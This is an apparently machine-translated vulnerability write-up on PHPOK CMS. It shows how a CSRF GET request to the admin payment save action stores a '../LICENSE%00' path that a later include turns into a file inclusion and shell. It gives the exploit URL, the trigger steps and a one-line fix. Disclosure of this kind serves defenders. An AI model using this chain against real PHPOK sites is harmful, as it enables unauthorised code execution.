PHPOK combined with CSRF (GET type)-GETSHELL

PHPOK combined with CSRF (GET type)-GETSHELL

PHPOK does a good job of input filtering, and addslashes escaping is applied to all input parameters. addslashes does not provide security protection in some scenarios. Here we use PHPOK to give an example.

Getshell uses the include method to filter out LAX defects. The Code is as follows:

File framework/www/payment_control.php: submit Method

Function submit_f () {$ rs = $ this-> auth_check ();... $ payment = $ this-> get ('payment', 'int ');... // retrieve data from the database table qinggan_payment $ payment_rs = $ this-> model ('payment')-> get_one ($ payment ); // $ payment_rs ['code'] indicates the code field data of qinggan_payment in the preceding table $ file = $ this-> dir_root. 'payment /'. $ payment_rs ['code']. '/submit. php'; if (! Is_file ($ file) {error (P_Lang ('payment interface exception, please check '), $ error_url, 'error ');} // contains the $ file include_once ($ file );

The include parameter $ file is controllable and comes from the code field of the database table qinggan_payment. Let's continue to check whether this field is controllable.



File framework/admin/payment_control.php: save Method

Function save_f () {$ gid = $ this-> get ('gid', 'int'); // ($ _ GET or $ _ POST) external code value, addslashes $ code = $ this-> get ('code'); $ id = $ this-> get ('id ', 'int ');... $ data = array ('title' = >$ title, 'code' => $ code, 'gid' => $ gid );... // store data to the database. The code value passed in by the get method is saved to the qinggan_payment code field of the database table $ this-> model ('payment')-> save ($ data, $ id );...} to sum up, the value of the code parameter stored by the get method is stored in the DB, And the include method obtains the value of the code parameter from the DB. This allows you to control the include parameter to create getshell. The include file name is 'payment /'. $ payment_rs ['code']. '/submit. php', we need to cut off the submit. php, because the database code length is 100, the separator method is not good, you can use % 00 to truncation. Here, we will explain why the % 00 character is not affected by addslashes. % 00 will be escaped as \ 0, but it will be changed to % 00 after being stored in the DB. This second use case ignores GPC. 1. Use CSRF to enable the payment function and set the code as the LICENSE file in the root directory: http: // 127.0.0.1/phpok/admin. php? C = payment & f = save & code = .. /LICENSE % 00 & gid = 1 & title = 1 & status = 1 2. Go to the "product display" Next ticket on the homepage, go to personal center> order center => payment, and select the payment method added in the preceding section to trigger the getshell solution: filter input or prevent CSR